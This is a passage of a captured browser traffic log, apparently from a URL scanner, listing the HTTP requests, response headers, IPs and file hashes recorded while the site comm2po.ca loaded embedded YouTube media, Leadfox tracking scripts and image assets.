VNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr1---sn-5goeen7y.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 May 2007 10:26:10 GMT
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 1223
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Restrict-Formats-Hint: None
X-Content-Type-Options: nosniff
Server: gvs 1.0
app.leadfox.co/js/psl.min.js?_=1586443542474
172.67.71.4200 OK 40 kB URL HTTP/2 app.leadfox.co/js/psl.min.js?_=1586443542474
IP 172.67.71.4:0
File type Unicode text, UTF-8 text, with very long lines (65191)
Hash c2b7756970a7f9157dfb4caff5f67c70
0439d203105d82870c2a7b7d3d4569b4f2b77fae
5f7cf87f77c27e95101c02de18f4d37b864911a9a76564133b1ed29377039148
GET /js/psl.min.js?_=1586443542474 HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:41 GMT
content-type: application/javascript; charset=UTF-8
last-modified: Tue, 20 Sep 2022 17:43:13 GMT
etag: W/"1ef70-5e91f5cc18e40-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 11
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UyGy2xmGDCHDsN7wlxPXFj0RIPXh%2FM15DknIa6rwUqTaoobuc3wpdKl8ot%2Fk8HRIxDbAuPhjLZB7ZFCSICeXz0RC4UQO02DbATLvR63AAB6VWz0V1Xc70%2Bm3Jl%2FH6D6k"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006e50eefb4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
rr2---sn-5hne6nz6.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgVoFAc8IZ6WgDA7ywSZMlCEjIWoUrxR3bWNWV35cJP6ICIEOw7nZD6UASlagCfBRY796ihhO1PdizVAq_IqWNKb5x&range=0-11538&rn=5&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
74.125.100.199200 OK 12 kB URL HTTP/1.1 rr2---sn-5hne6nz6.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgVoFAc8IZ6WgDA7ywSZMlCEjIWoUrxR3bWNWV35cJP6ICIEOw7nZD6UASlagCfBRY796ihhO1PdizVAq_IqWNKb5x&range=0-11538&rn=5&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 74.125.100.199:0
File type WebM\012- EBML file, creator webmB\20\012- data
Hash 6a3011b34ab1a46aa182311e49ccd48a
a13b5984827dc2a07b2a263f2268acfca63ced8d
930238a78091f2fea88c806463b1acee8616030fe8c1e589b5ad484c1e39b7a9
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=251&source=youtube&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=audio%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&gir=yes&clen=11539&otfp=1&dur=24.861&lmt=1564990529238509&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRQIhAM5023TuLu7XlSoL6y2AZCw7vqzpbAAS5b8mP84qJq_3AiB-3lMkl5HWFODXAYUovpfg3ewG5qejYGGnkeS9PibBOw%3D%3D&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRAIgVoFAc8IZ6WgDA7ywSZMlCEjIWoUrxR3bWNWV35cJP6ICIEOw7nZD6UASlagCfBRY796ihhO1PdizVAq_IqWNKb5x&range=0-11538&rn=5&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr2---sn-5hne6nz6.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Last-Modified: Mon, 05 Aug 2019 07:35:29 GMT
Content-Type: audio/webm
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Accept-Ranges: bytes
Content-Length: 11539
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: gvs 1.0
rr2---sn-5hne6nz6.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgUwtqN2vLOPpKcTBRn7C63niO3-wSI6trWmC3hj8pzRQCIQD5y8_PuAodT4jPw_QtH2uWGhS6qSDA1QUeesfbe8MwWg%3D%3D&sq=0&rn=6&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
74.125.100.199200 OK 288 B URL HTTP/1.1 rr2---sn-5hne6nz6.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgUwtqN2vLOPpKcTBRn7C63niO3-wSI6trWmC3hj8pzRQCIQD5y8_PuAodT4jPw_QtH2uWGhS6qSDA1QUeesfbe8MwWg%3D%3D&sq=0&rn=6&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ=
IP 74.125.100.199:0
File type WebM\012- EBML file, creator webmB\20\012- data
Hash 663ec483caa7e0e51b0d9bab0adf4577
7a0e0db43f87a2ada947662652ec261f356137af
eeb988daa8cdc427846fddc5ff7e10af6131257414ca59565854765846625c8e
GET /videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&keepalive=yes&fexp=24001373,24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&alr=yes&cpn=2H-Sc79IcABrLbOK&cver=1.20220918.00.00&cm2rm=sn-capm-vnae7e,sn-5gole7e&redirect_counter=2&cms_redirect=yes&cmsv=e&mh=g8&mm=34&mn=sn-5hne6nz6&ms=ltu&mt=1663733697&mv=u&mvi=2&pl=21&lsparams=mh,mm,mn,ms,mv,mvi,pl&lsig=AG3C_xAwRQIgUwtqN2vLOPpKcTBRn7C63niO3-wSI6trWmC3hj8pzRQCIQD5y8_PuAodT4jPw_QtH2uWGhS6qSDA1QUeesfbe8MwWg%3D%3D&sq=0&rn=6&rbuf=0&pot=D6YVB1aMmemupi3N_Nd1DaRoBJe1FzyLuY2qTMpi-uNh7xe3N1Kug-3zBa51fF-NAlVNcGN-vyjUgTi5b5ofs6bMpwjjKJLh9-wqlUqkMJb9yfvJhV2UPZMIKIs4hh0NEarZbtQ= HTTP/1.1
Host: rr2---sn-5hne6nz6.googlevideo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Last-Modified: Thu, 15 Sep 2022 13:27:33 GMT
Content-Type: video/webm
Date: Wed, 21 Sep 2022 04:23:45 GMT
Expires: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: private, max-age=21299
Transfer-Encoding: chunked
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Access-Control-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube-nocookie.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Restrict-Formats-Hint: None
X-Content-Type-Options: nosniff
Server: gvs 1.0
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fab5a64d4-8802-4886-ab88-03c39eb96f1a.jpeg
34.120.237.76200 OK 5.2 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fab5a64d4-8802-4886-ab88-03c39eb96f1a.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 5a21b393fc4213d090f794f3eeee2333
cf334c1fc3191c5dcafaa2df55f62a10e16fda69
43553a352e6d7c8108bd5152d1c949d8acfb922344a00f8c77c986e2d8f665d9
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fab5a64d4-8802-4886-ab88-03c39eb96f1a.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
content-length: 5174
x-amzn-requestid: 19cef827-7a71-4789-ae2f-03861f7d65c1
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YsvkiG9BoAMFqRA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63282c83-695865cd7f0a236300a179cb;Sampled=0
x-amzn-remapped-date: Mon, 19 Sep 2022 08:46:59 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: pt-UpDrev8YQvpm0E3xWMpkUSsxo80_jlCq1jJ0ePrpLb9rE7_kQ8w==
via: 1.1 5ab5dc09da67e3ea794ec8a82992cc88.cloudfront.net (CloudFront), 1.1 ebe4011a81a36e2bf678f69ce1711330.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 22:20:37 GMT
age: 21789
etag: "cf334c1fc3191c5dcafaa2df55f62a10e16fda69"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/revslider/admin/assets/images/dummy.png
72.167.59.18200 OK 0 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/admin/assets/images/dummy.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
GET /wp-content/plugins/revslider/admin/assets/images/dummy.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:01 GMT
etag: "1560c63-49-583d3b4f75740"
accept-ranges: bytes
content-length: 73
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.youtube.com/iframe_api
142.250.74.174200 OK 0 B URL HTTP/2 www.youtube.com/iframe_api
IP 142.250.74.174:0
GET /iframe_api HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
x-content-type-options: nosniff
expires: Wed, 21 Sep 2022 04:23:42 GMT
date: Wed, 21 Sep 2022 04:23:42 GMT
cache-control: private, max-age=0
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=31536000
cross-origin-resource-policy: cross-origin
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
cross-origin-opener-policy-report-only: same-origin; report-to="youtube_main"
report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
content-encoding: br
server: ESF
x-xss-protection: 0
set-cookie: YSC=RDk9idXXDns; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none
VISITOR_INFO1_LIVE=knNK5l6duKg; Domain=.youtube.com; Expires=Mon, 20-Mar-2023 04:23:42 GMT; Path=/; Secure; HttpOnly; SameSite=none
CONSENT=PENDING+848; expires=Fri, 20-Sep-2024 04:23:42 GMT; path=/; domain=.youtube.com; Secure
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
app.leadfox.co/service/track/init/
172.67.71.4200 OK 0 B URL HTTP/2 app.leadfox.co/service/track/init/
IP 172.67.71.4:0
POST /service/track/init/ HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 306
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:43 GMT
content-type: application/json
access-control-allow-origin: https://www.comm2po.ca
x-kong-upstream-latency: 171
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=deFljyzz90FH93VYaeJgrO6bcawCw%2FoETWhf8hdiLlyCrNWhb4qdZBHwHd2KI4C0Pt1lw%2BGujMfltqvritxsyzoGCzDl0qMEFlasqSIjwaYqxCntpmfXqYbf3VO8NVN0"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006ed2c50b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
app.leadfox.co/js/jquery.initialize.min.js?_=1586443542474
172.67.71.4200 OK 0 B URL HTTP/2 app.leadfox.co/js/jquery.initialize.min.js?_=1586443542474
IP 172.67.71.4:0
GET /js/jquery.initialize.min.js?_=1586443542474 HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:41 GMT
content-type: application/javascript; charset=UTF-8
last-modified: Tue, 20 Sep 2022 17:43:13 GMT
etag: W/"c1f-5e91f5cc18e40-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 1
x-kong-proxy-latency: 1
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q3djX1e4YpyGlpqvEKR08Bnn9kUZzCZvLolw5JB1ibPlGcwhZXaxFFOM2YdnPAGTEhtFavcHOTVz5cRtqEUM%2Bf0zke0ssmBg9RlN2Dl22nFaI6SJrMOOujaxlwKnlHRW"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006e3ee0ab4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
app.leadfox.co/js/api/leadfox.js
172.67.71.4200 OK 0 B URL HTTP/2 app.leadfox.co/js/api/leadfox.js
IP 172.67.71.4:0
GET /js/api/leadfox.js HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:39 GMT
content-type: application/javascript; charset=UTF-8
last-modified: Tue, 20 Sep 2022 17:43:22 GMT
etag: W/"66d1-5e91f5d4ae280-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 3
x-kong-proxy-latency: 1
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=quyhKOO1mFuGXi84JAxMqkcutjaaDQohbKX66jXWVEGW8pcsQokftyjMWCqEuil909vS2pCBcWhAWh2AWXuOUHkeT9yTGvb4%2F1onrlDw1EJ068i6F6aOf0fSTRH%2BZGWu"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006d57d58b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
